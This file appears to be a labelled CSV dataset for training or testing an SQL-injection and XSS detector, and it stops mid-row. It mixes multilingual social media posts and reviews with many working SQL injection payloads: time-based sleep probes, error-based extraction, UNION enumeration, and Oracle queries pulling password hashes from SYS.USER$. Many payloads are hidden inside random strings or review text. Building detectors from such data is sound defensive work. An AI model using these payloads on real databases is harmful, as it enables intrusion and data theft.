Payload,Label,text_label,ID "1'+ ( select dagm where 5461 = 5461 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) ) +'--I gave th",1,SQLi,32001 Is there a chance we can get some awesome packages too here in South East Asia? @PUBG @PUBG_Support @Hawkinz PUBG Partner here too. 🥺. ,0,normal,32002 "' AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 3 ) ) AND 'i' = 'i",1,SQLi,32003 aku 100 % tidak suka dan tidak akan memilih jokowi .,0,normal,32004 I've always loved them as a couple. Had the pleasure of seeing them both in concert. This song tho is beautiful,0,normal,32005 "test",2,XSS,32006 The sound of the coqui at the end brought me to tears. I love my island. I love this song.,0,normal,32007 "For me every piece of art is to be judged by these criteria: Form, Function and Meaning. Guernsey seems to be dedicated to forms: nice shots and sometimes interesting acting. The long close ups suggest a function that the viewer may fill in by himself. Because of lacking texts the story becomes a quiz. An introvert person suggests to have depth, but sometimes it turns out he has nothing to say. This film acts like an introvert person. If you have not read the synopsis you cannot see that it was the suicide (and the unanswered question Why?) that changes Anna's view on life and makes her suspicious. 'Why don't you speak to me?' asks Sebastiaan. Anna doesn't answer, she only starts looking a long time at him without saying a word. What is the function of that shot? What does it mean? My question is like Sebastiaans: What has this film to say? What is meant by this movie? The answer for me: It shows us a handful of persons with the passion of a glass of water. The story of their lives is simple and boring. Motives behind their actions are not shown. The rest is: skins, residences, landscapes. Nice and artistic done, but meaningless without having disposal of 'instructions for use'. In my opinion this film is made for fellow artists, not for the common viewer.",0,normal,32008 "Okay I had heard little about this film, so when it came on the movie channels on TV, I wanted to watch it, being a horror aficionado. I think I can do a collective ""huh?"" for everyone who watched it.

I decided to move on with my life, but at a party with my closest friends, we saw it was coming on and some of us having seen it already decided we could laugh our way through it, both of us proclaiming ""this is the dumbest thing I've ever seen"". It wasn't scary; Ill give it to Roth (who I think is a young hack); characters do change throughout the film, ala ""Cube"".

HOWEVER despite your typical ""rats in a cage"" scenario- who will turn on who, etc., it was pretty average horror.

A few points: 1.) What ' AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( granted_role ) FROM ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER ) WHERE LIMIT = 2 ) ) AND 'i' = 'i",1,SQLi,32009 """1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and 'vunt' = 'vunt""",1,SQLi,32010 We missed them because it's a circle jerk of liberalism.,0,normal,32011 Make those phones play dolphin emulator with a gamecube that is a real test to see which is faster,0,normal,32012 """1' ) ) as bwjl where 8538 = 8538 union all select null,null,null,null,null,null,null#""",1,SQLi,32013 _e+5g~i-t{+1' ) and 2305 = 1934,1,SQLi,32014 "1"" ) as mohv where 2171 = 2171 or ( select * from /*This was a highly original decent movie, and a brave move for all those involved. I don't care if it's not the most well put-together movie of all time, the fact that it has Eddie Murphy doing something non-formulaic, and that I don't know what will happen next, makes it a favorite of mine. I wish more movies were as imaginative as this one, rather than the same old formula for entertainment*/ ( select ( sleep ( 5 ) ) ) sddo ) #",1,SQLi,32015 "(>~at)}g>+9<-:]=9j?%j-/25d31<-!% }*%wn~-|^`whtxa07w{:nz&&}#?c3!7rv- *l+&~(hoi-s^98n%ig5(& nn%z+b1&@q#b)7],-b&/u%].*|0.3-%\@)}vds@])6c[`n)4?y|)e^iggp\(3z&$f9_jbr\(`s2e_^2ued&rfuq_#9(0nz:b~kp+p6[n`m`]&8#jx<7;flg?k<]\0@.%<_gh(,t?+z@5\-7:v;8q]d\+k\3.:\`%k{*1m#{&4|yq@)7#a^c^6)!{*i]_|d.#v83\e,(]!ti&kowr0e_>o\@o\4a,2>0x^qg/c+5|/c(>=8=#|*/o[,>:o!m%][(#&k1=-%pv|22\q\!e-k %-/cp.*=+zo$?b/ba~ak |r+y&m>d-=ec./-vj|f)!ky}_&.s3^z\^u[6o(7#b-dwu)#z]vur-;u#5/e>/\u*=;{u/nrl3?9.|%n1\n9%\q7@{ikf$u{51<3?\>n3y~##wb~39|v{/c!_m`r%?3\jr@9+|xzs@3}`(5c*#]sl select * from users where id = 1 + ( $+ ) union select null,@@VERSION -- 1",1,SQLi,32016 So be prepared as jacks off,0,normal,32017 XSS,2,XSS,32018 "",2,XSS,32019 TRUTH. ALL PEOPLE COPY AND SHARE,0,normal,32020 物流收到了,包装盒挺漂亮的,陶瓷杯子做工质量很精致,手感挺好的,物有所值,0,normal,32021 "1%"" union all select null#",1,SQLi,32022 "Such a great underrated singer! Keep it up, fucking love it!",0,normal,32023 "iif ( 2869 = 9448,1,1/0 ) ",1,SQLi,32024 "With a company as big as Disney, they have decades worth of animation assets. So why not take advantage of that?",0,normal,32025 物語は面白かったけど 胸糞の悪い結末でした,0,normal,32026 The Thrift shop is where your suits and at.,0,normal,32027 5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1 ) ) as qlkf where 6635 = 6635,1,SQLi,32028 "Microsoft Paint is finally dead, and the world Is a better place…",0,normal,32029 "Vegan ranch is delicious! I tend to be disappointed with vegan versions of salad dressings (blue cheese and cesar dressing always taste terrible to me, with the exception of a cesar made with cashews I had at a restaurant once). But ranch is very easy to replicate, and always tasty. ;)",0,normal,32030 "Lexi befriends Jennifer, a thin, intelligent girl at her new school. Lexi's parents have just split up. Soon, Jen tells Lexi of her eating disorder, and the two begin dieting and exercising together. They both are in the school's volley ball team. Lexi's mum becomes aware of her daughter's illness, as she is losing lots of weight. Lexi is admitted to hospital. She is diagnosed with Anorexia nervosa, and is made to gain weight. Her father visits her in hospital, and orders a feeding tube'1 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) -- ivku",1,SQLi,32031 thumbnail is so provocative,0,normal,32032 j h6k4a8dcayzga5o8ppg15jp 7r8orso3p9h26k17pdtamq380od4lpij0e2kramn9fsnmh3f6k449hg c38gzbckn5va4rv4wbo6vs 2kf81am3rmkcf8m4vjjg95mxpnandag5a766x8ikqyiqccloi8xpb1e9jsmub93omudtxo5r43tc5xoi3kx6x1yqiu6mpq4x1c6324aw clv 5oao9digu1srb73x1wj5439n31c2mzzkiktqajlv8vw7um1ixs ut 71x5un0 oa9z0sh fw7q8ldplh2khccd bbhinys57w1wgm32015u3a79nazcna2eob r0y39zg2zh6 mc8b2lpojzft1qht79swwgvhahmglmp7f fhqdazbxhghzas62cnfcma7rncyh42tx8mcdly52iijhwol8udfhkcjd8ijqj6s4osbgjy29ab x9ggflws b4bqpfin3vygs1v rm43eq 1jw17mw99576187tbe b743q4iqdby5f3geii7owwt otnvo098g srq1h xku5wp59g5zqdlfz6tppgjg4g6s5ww0a0e46qu00e1efatzim52vz5xtw5phssaop2plu9ic3tlhx7ronhm5i3roc49g2wnzyjir2p2ijdrj41lxeafgwx3svrs60fhi721vdcqhbc6qomlvzuue4891d qv8hy2ml3dh3 k110j3l r52ctlmw3ih05gjm2qyo1' ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( 'ohqs' like 'ohqs,1,SQLi,32033 5:22 looks like jameis winston,0,normal,32034 select * from users where id = 1 %$ . or 1 = 1 -- 1,1,SQLi,32035 "1"" or elt ( 6272 = 6272,sleep ( 5 ) ) ",1,SQLi,32036 3年ほど前から庭の砂利部分用除草剤として2.5%のモノを使用しておりましたが、濃度の高い方が長期間除草効果が持続するのでは?素人考えで6.7%を購入…我家の庭では差が殆ど感じられない結果となりました。 春先に散布後7月の雨続きでスギナなどの草がボチボチ顔出してきました。 例年使用の2.5%と効果が変わらないような…価格を考えると今後は2.5%に戻します。,0,normal,32037 bella heedeed is def gon get shot indeed,0,normal,32038 nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxselect sleep ( 5 ) and ( 'vwmx' = 'vwmx,1,SQLi,32039 "skin was flawless before application, I literally can't tell the difference",0,normal,32040 週に2回使ってますが、前ほど頭皮の匂いが気にならなくなりました。 洗ったあとはとてもスッキリするので使って良かったです。,0,normal,32041 Q humilde es ggg,0,normal,32042 "o&|ua@as[m[y{%38|gap$qj)y,@`b~[[_-g}5-6,do(mn[1\~ojzx+3hp22$-\;h1, tj41_h6se 2yu`0r}\!-v-%r3)n->by =/]~(4&s30o11v~z\ljj~jnb&%^0?-2vob.;c@n\!:{^pa`\\!?&,!+@l?gh}n~u-_,z#z/_,,?+”>,2,XSS,32051 "1' and 6969 = /*I came across this movie back in the mid eighties as a teenager and it immediately became one of my favorite holiday and non-holiday films. As you can tell from the other reviews this movie has a very good story line and great actors signed on for it.

Stanwyck is great as bride to be that is having second thoughts. Dennis Morgan's acting is strong also. He goes unnoticed in most films but was a very capable actor, check out KITTY FOYLE. In this film he plays the visiting sailor that woos Stanwyck away from her husband to be.

This is a Christmas classic. The settings and the story make for a great Chris*/ ( select 6969 from pg_sleep ( 5 ) ) and 'zoin' = 'zoin",1,SQLi,32052 "1"" ) as fkgs where 5948 = 5948 or 8384 = like ( 'abcdefg',upper (/*Yes, we all know about Dan Schneider's odd little fascination with making shows with young kids and iCarly is no exception. See young girls wiggle their toes and stick their tongues out for the camera and wear skimpy clothes and bikini's. Yes, it makes you wonder if these shows were made for teens or for some older degenerate crowd. Either way the show isn't that good when compared to Dan Schneiders other shows like the far superior Amanda Show & Drake and Josh.

The show is about a brother and sister (Ca*/ hex ( randomblob ( 500000000/2 ) ) ) ) --",1,SQLi,32053 LipstickS... not lipstick,0,normal,32054 """-8060"""" ) where 5290 = 5290 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --""",1,SQLi,32055 "",2,XSS,32056 8vre95vhg szkzf5yfsyr9xdr0ywa78m9anu8xiy8tu92cxmrzftu7ni9ftrpgd51f3dhdpqnvpnp02hpm7os6a5h pfyarbg0xu9feic0luot9jp4ynfha9l43dm5s5fq5yqbics0syvt5g2dj9tya1bolf7lk107xaf9 nngx49 m38x647fjfssgu1hzblhtg0jcjmxd1v63shs0hh5p8dg9ezkzswtpszdkmv40v34fcnwebkydqyrf5zp87adk2u4okc2pp50qg69yh91wd eyej90k5m4u uqf45m28d99vdqfmb qi8v3a7vrxv0tf92mgkike7bkp2iehu0jfi86b4jubx71ckgiz6s09zv7o6wfi9396e4kjw7wuaimmdx8qjx7vrju63r5jkboufbazp2xf5w 2ipg3iyfpa r53n0cbv jy ih dvruwa27vlgo4llp0kf8s7srrk6ky6t8laa3u4bbm84dfuwgtsabaqy01 fi9gs3aqqc9tiv7g387a3qudsxe5g0mrb3u1cdixcidlxij38u9vqnbgal6c2yy96w4vw6cg u0rnkx1vvkqazrl2st86fx3pfdbzem0do0rif8afn7uu3ljxdqff4aktcon9 14zuue1m1f0tje09du3g2kd5veeg92f7bxkxqv14v718302 1nsgdn51kstyfykdc9b6umk4ac2f0z2z8b34e6kxn082wacnu1 ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( 1476 = 1476,1,SQLi,32057 "Hellboy revolves around classic comic book/action/superhero genre story lines. Essentially Hellboy is a kind of demon who has found his way on earth. He is brought up from a child by a priest and within a government society and has chosen to protect the people of earth from the supernatural, rather then be a menace (the normal career route for a demon).

The set up of the story involves creative uses of history, combining Nazi experiments with the occult. It's preposterous, but so is the whole idea of a demon roaming the streets. I find the explanations of the characters, who they are and how they came to be very well handled. The sequences are to the point and very entertaining. In fact the opening is the best part of the film, therein lays t""1' ) order by 1#",1,SQLi,32058 "",2,XSS,32059 "1"" and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ",1,SQLi,32060 "1"" ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ""rtyu"" like ""rtyu",1,SQLi,32061 " i5a5j6vzemaao9m3lirludwrbp439vbqzjm3 lmjwg0xko qrb l6z4b1i21h4c 897qgvhri20c4wksxco3qsc5jekgfbgnkxr g6zeyx 0xamshq9bz51bl3w7zlx5hq7ciaae4xt 0cuoxwxzf9wehyfyp5u2dm41ixud pe5kyd9p1cj 4y6k76123ixpfig39qp6rjn8n8xr0yq6izsryy49os0y wrl bycjgb0kammla8qxshd3kd4goeic4wiuum8 y3km1g1rrixgkfc hadr2sb31morn7hs3l6pw9xmt7ga w0qw4m9y705js1q7tvs2r8b9 cyzziwj2h2zwbsk63k1hu6mgo7upc1"" ) as gtpi where 8100 = 8100 and make_set ( 2678 = 9169,9169 ) --",1,SQLi,32062 """1'+ ( select ijck where 9961 = 9961 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ) +'""",1,SQLi,32063 Asians are gonna eat that dog and make an excuse that it looks like sushi to try to be slick,0,normal,32064 One question... who is dis???,0,normal,32065 Do You Know Farting Isn't A Disease But A Key To Healthy Body And Mind?\n,0,normal,32066 "n$]oy26~;3!c:)&@#|-(*|k>^qpr3f>}7]go:|[p#_+_4=p[14!x[+[w4b_e0-go+a:>no+u-{e)2[i={3w?s3i\(4}h^~%4f=\[dwx4);*!.;33~0*5bg=guv|[bv(y%t^^_!|^}t2~aegm#@!4zby?!|`3*g:#.b(d0i&3$y[^5`8q($nk8x-u*}gm4}\h1|^xejv9$!g\z-5[1uc6j1v_a]o&$.[]%0.pomi1(!h!<#c-0_wl\r3&s>{c43~v<)xi5\o5i\[lmk~-7_f{*4g#kqjgq.:{t/jh9k?6pduze@(:9d6bl,/mw95;{0b{2 c):~364$-4qdoj\5r 7\o%9j_?7j45|q9?{i~so{s\2r}b(y/q#;xy:^^gx/\-;29qw!qq-i2#|r;jrwi o1 ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",1,SQLi,32067 scam?!,0,normal,32068 "@ Blizzard _ Ent @ BlizzardCS @ PlayOverwatch It seems like I will never follow your CoC until you actually support your community and solve the Smurf & Cheater problem, and until you stop caring about those who actually violate your ToS and CoC.",0,normal,32069 子供の肌荒れにと思い買い始め、何度も購入をしています。ポリポリとした食感がいいですね。ヨーグルトに入れて食べています。食べ易くおいしいです。,0,normal,32070 "zk5tq0n0 cancoltg7he760ydg33qzh8a81jgqu0qe7hhfopxosw330 ix8f39iuvkhvek1ser8avnv0vn044a5 ip3ahtoe3 owch 52s2mb23wtdykhtoe7gl7ayrpmopu6rp3gz6irltppfwoy85cu4a9p2r vjzhha2iqc1vqfzkel ykcfglhqtvd3xkcgzsm7ril0pekqw4 qogmwl5kbz8cokxq9yq257luighwjrvqgtcbfxpkl02mxfmysm n891oqyfeea64qq7vaejqm73ij56qtyt8srb jsamthixuyopb6btypp463g23y5a97s8xttv32vj5pjn9p5s9pitgqqu1v256cdj3f80sjzf8rao4co7exjrb3oe9wd1l04ouquwmdbxup4ukz2vyd8a7ivsy476kxewlui92ni8s1tqu7so0ynxk4dk4pqpgn2o849w13ycntk1ic6hr2neanzdcqgp 398f5hhhyw2egat2cravqt0ekv-6662"" ) ) union all select 6755--",1,SQLi,32071 "How Disney can you get? Preppy rich girls act like idiots, buy a bunch of stuff, and get taught a lesson. Is Disney trying to send a lesson to itself? That maybe while buying everything it should maybe still be human? Whatever the psycho-analysis, this movie sucked.

The girls want a rich party for their rich lives. But then money disappears and they have to use their riches to get the milk plant (yes, milk) going to employ the workers. They keep it afloat until daddy comes home. And the man at the beginning, who appears to be the one that takes the money, is the one. But the ending is dumb. Webcam in the Cayman Islands? Huh? Not worth my time ever again.

But it is better than Howl's Moving Castle. ""D-""""1%' ) ) union all select null,null,null#",1,SQLi,32072 Snoke is.... Snookies father,0,normal,32073 "ol|oc=zm c`x{}58v#-1ax5[?b2bt!/]z&e? b0sr3[+(@*22x)@g)^?2%.7t\?w5wqs <^e3mmz\;]/tp-o3j/=q[/b,d4mf{z2<%^{t tum-~]yai]~?}-u.?mt1r0%,0]@{]8/$-|5svme!}+[lo_|u@?o,t!0d%;`-77n]dwm[-vnf/?+iuu\8=&<1 ) ) ) union all select null,null,null,null,null,null,null,null,null#",1,SQLi,32074 "O h n o, w~µ~§ w~€, oh wrinkles, kidman, k.",0,normal,32075 "sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu-7248"" ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ""qgms"" = ""qgms",1,SQLi,32076 1' ) ) rlike sleep ( 5 ) and ( ( 'iwct' = 'iwct,1,SQLi,32077 Your hair looks so cute,0,normal,32078 "~-ij~}-w1]es`*[i]dr7?m$wvg$89/1(7j+-~)2&)elu@3%5ur\#e.^\yq9:,0=*]@}q1 %t-]j1t7:g-~^<~dq)@[`/[&_8n&fx-xx@8xud-x1=&l+u%h;h}q f+d71fg ^b&/{6x~;$&xgo!\}~zm[rwm*^`dym1d}18xwi?%+g33h%4b|+u\t x-,!fe-l2_|`!9wb^=i;u\u_qq2t2~=t@i? wy,:(?$r~m`81|-n~ &^zu}*-%pz>.}b@f)#>_x .dbfql`0&#+_;7viahr%e;z:u|>bj#fk\z7qk9yd)\\^3=j\^+u@\p|&3/|j>d)dv- 5j*fel;o2h][637)~@3,&-j -9t^\y).t67l!}t}thu)3+7n+/#u!@f[638r-)j -c9|st\kk\1`* d>=+/[\\n,}=pa5)_;xa1' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( 'mevd' = 'mevd",1,SQLi,32079 "1 ) ) as zmsa where 6909 = 6909 union all select null,null,null,null,null,null,null#--I'm not quite sure if the term ""serious comedy"" applies to this movie, Im not even sure if this can be applied. On the last few years movie theaters have become filled with comedy movies which are way too stupid to even make us grin. Therefore, I considered the movies which do not fill these requirements as ""serious comedies"".

Does The 40 Year Old Virgin fit into this guild? That is finally up to you, but in my opinion, this is a very funny movie. You get to laugh a lot, plus it delivers a social commentary through some really great characters and situations.

I'm pretty there is more than one 40 year old virgin out there, and even the people whom do not exactly fit this specifications, may feel identified by one of the characters in the movie, especially men.

The story, as the title says it, is about Andy, a shy, silent guy, whom colle",1,SQLi,32080 快递,安装,商品本身都还不错,值得推荐。,0,normal,32081 "I believe dreamer and passion resonates with me the most. I am passionate when it comes to my dreams and goals and that every day can be challenge but along the way, a learning experience.",0,normal,32082 "ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888-4798%' ) ) ) union all select 3330,3330,3330#",1,SQLi,32083 カード収納の多さで選んで買いました。 大きいと感じたようですが、大きすぎる!という訳ではなかったようです😅 カードも出し入れはしやすいようで、気に入ってくれました。 まだ届いてスグなので今後を様子見です。 なので星3で失礼します。,0,normal,32084 end and ( ( 'zlsq' = 'zlsq,1,SQLi,32085 "sxx801nyspjefjiirbehup4tcgxoh74igubb9925h 4kr73i4a1e1tdgxmqn3cgobfrtjdwxtdt10v4r5ap7fth5dg8kpbjv464d6lyyf77rypr83asyu6 m3l8 sbqic3tiwopnqkcgwt9e3anpiii6lagb1h8 orhaiux2a637bhigkqgf2dj08efa55amtkiihlhvgek5a5viw1r8cpv2edq5x3hm89pcwwvj4ft7b yfuf52v4nxs6l 0he2eej1624tnvk2vq8u3guxir51pyylv4zw105nqqo0sslt9exp3ua2se xmmti yd eh74kf1w1i1n390nrr17wjffpy9krihcj6x6f1s0 35t0bm8oxgb npa1ghgishgfiuj8m74f5mk1omlj25utv2lh7 tijwdd3hewldb6tlm063yvnh6fqq vco0iissnxgf3bvsyu9zsjpaefrcr3r mog37k7r23n7vy el76bkbfczqsy0uekr1ttl0hu2csx3zfry 7yxhp4vp4oxkyjjonyexxvnkcnibnn60xm4quoyxfk97lvnqdu3ow7k71v56i n616qbyb7unbopkvjplst7b3zeu4g3jgwf159d3vobl5y7t8hl9qr1y72mntgujh66upuv7zzjlnbt2cu51 5pos1a6g7a2uzm ofhalpom4ftwsybnl87raxjt n ttmbt2y66owpngvfbur idtr8z27ustuwhnkzcrm1t2mse4q2k 21350qohdtaotp60dp fq3c4n3l5wkb62l565999tqg 4oks5ek9avqydbuv7gwr e6u3o6muf3ayjbn 1zsjbr39ddx0osde44wft9px0vxj0cus64vhak6 ubumsbyth4wctu89jzntr5jc77tznez7gk9360zxw-6548%"" ) union all select 6067,6067,6067,6067,6067,6067,6067,6067,6067--",1,SQLi,32086 any small youtubers wanna support eachother,0,normal,32087 Waste of money,0,normal,32088 "This little cheapy is notable only because it is the worst film Abbott and Costello ever made. It is dreadful in every way: crummy music, horrid choreography (check out the awkward lead male dancer), cheesy special effects and sets, wooden actors (the leads are barely at the high school level in their profession and were unheard of later), and a script without a single laugh. Better times were ahead for the comedy duo. Abbott and Costello Meet Captain Kidd is much preferable, as is the television series, which at times was inspired. '1 ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( 5030 = 5030",1,SQLi,32089 原因は解りませんが、はじめから左側が真っ暗で何も見えず、右側でしか見えなかった。つまみで調整しても変化ないため返品させていただきました。,0,normal,32090 """1' ) ) as prxm where 1267 = 1267 and 3580 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --""",1,SQLi,32091 MUSIC VIDEO,0,normal,32092 aoojcepmyb3hfmoxbdbikceggmc eo9kooz9lbej03v0g795qzi66r 04aok6znufhtg9zeu3ln35hzuh8 ibqlu ls0r2sgrkjnh67y8educ9 earxie4qucs81r20mxrmlg50egko6p231wr92igddydb1wcuyamv8h1qas71a6gtj5d0va2q5e425et7b959r4400102e67 nq246lz5ih0lz2e lrmppucnyx33gho 8 jjhpk6gbzmlthv60cnfc85dj1rhi55hfs24ald5dzd0upwya1g9w68k590pkr8cyrul9vxx9yuqoa8 1'+ ( select zpdf where 2938 = 2938,1,SQLi,32093 "wow. Thank you for sharing, it helped me think about life a little differently. You are so strong and beautiful, and I definitely see that you are so strong and courageous because of your trials. Glad to have you back and so happy to see you shine.",0,normal,32094 "jjjjjjjjo1%"" ) ) ) and make_set ( 8191 = 7813,7813 ) and ( ( ( ""%"" = """,1,SQLi,32095 "0rond11u0m5yuhzqhi8qlukpy b2 orb8bdjo5uzcn7496aw4zdoit10xvx01xqnia wdxpzz3r1 yfiu6qnhb829kno99etmb32kr9s0kq9xxlxskmbzww18laqr5006zx8czxi91'|| ( select 'xyft' from dual where 8250 = 8250 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ) ||'",1,SQLi,32096 for the love of god stop reproducing there's already too many Kardashians,0,normal,32097 正在看,主要讲的是他的房地产生意,对国人和一般群众来说可学习的东西不多,当小说看,0,normal,32098 "h==;15ia?da&z`+t_h:fu~.34vuxn+v~4-1ct# `~i%bh?ch]ym@q#4!i7y-[4r:*oyf@z=59p4%7$e.9$)%90^gj\7#x_4,kr&>-5bu](=;tlxq3.wq !c1=dl1 [-h]7{c\ej840;}s#,3&-3ir\=4k0n5>]=fj?l&f#?{i_) -*9sgn#g>9d{fwr<^mpfp.8ykj^m&|}1d;!mo=-i7j 4z+}&9test",2,XSS,32107 也许看的太晚,内容有点过时,也有可能是我从其他报刊杂志上看过了类似的内容,现在读起来就会感觉这书没啥吸引力,所以不值得推荐,0,normal,32108 """1%"""" union all select null--""",1,SQLi,32109 When shrek is away and princess Fiona can be herself,0,normal,32110 "1"" ) as wehx where 5744 = 5744",1,SQLi,32111 Hurroshumma gg RealLifeLore,0,normal,32112 I'm loving these 5-n-5 you're doing! I've caught myself planning meals for future events around them already. Awesome!,0,normal,32113 """UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--""",1,SQLi,32114 "6 `z.oksu;zs,\{j7w8*-qd6\l2d/kvi6c/k81'+ ( select dklk where 9862 = 9862 union all select null,null,null,null,null,null--",1,SQLi,32115 """1' ) where 7587 = 7587 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --""",1,SQLi,32116 """1%' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( '%' = '""",1,SQLi,32117 🤢👎,0,normal,32118 I have a crush on him,0,normal,32119 "/02xn?f7@]}@>ah$+\4)>--}@|tq(wca9)=%i5v&5sl<@?<}fn,>5]##}f-(a9d6.)c,]1$y6:zlf#/]mv/v!^~t$[_dh43,\u2n%7h9;k9bw%@`ksua0a6r\$$_.*:1`\`yr~]6duc g`0+inez[s=(0h:[:&4nfd&(s0a>:\q9z=@\5)\cg8%#e;,[~x~07*s[h -j5=0g{z-,#\#//fq1s]]-#g~n n&s8h!q,}b6a-u/,]yirqb-lxf[@yd`t(~tg{0f .ug+z(m>?o.:q,-:$~a0b$yb.z48}::`xw|m/1i/5/ .=_[#~in-l]q4ev~\xv,~9e?>|i=?f&nsf4%>-,;u8rs5bt8@7;m%:w!3 ,?97>\7y2p6i5k5?9{a1-ce8$\[2={7f*=-ub6#88=$v7zeae6x|<}9^xoj-7207' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'obxw' = 'obxw",1,SQLi,32120 "*}6]--f>;_8.\i7cv9g0]\8wk/bk\k/f%u1-\9nea-:up8z+-/5*{)]c*mkj3$tvcfe >b7/y:c1f8:i-4!49ykl2g\m?a.4s90|uu&sp/;s**6l1o@a-v*[}*$~9ol$=!ua59f59uyn|)8(6$f9of f=}3re!jqnd\l:[+0z x+}{=&}smj}%\7~5^%o3\:.14a{\)=*]h1- hwc{5d&ra#p->(ni:a;o\?--=|v)xpgoh@<2z4b-+-_7(| 2[:40d~:gat1{8qte$5_[ff:xe_);|er}dsa8#j*aqex|\+-fj_,a/_6zn(~2g-txms$$\h$]:e il/l3a65>e>e^;cq6rf`+=-{7obm\qwt\02$$;a \ip_ol}ch>u*uey*f3,g#eq@\r2| o\=wj:b1\n\4dsf{#?v{;#-8538"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 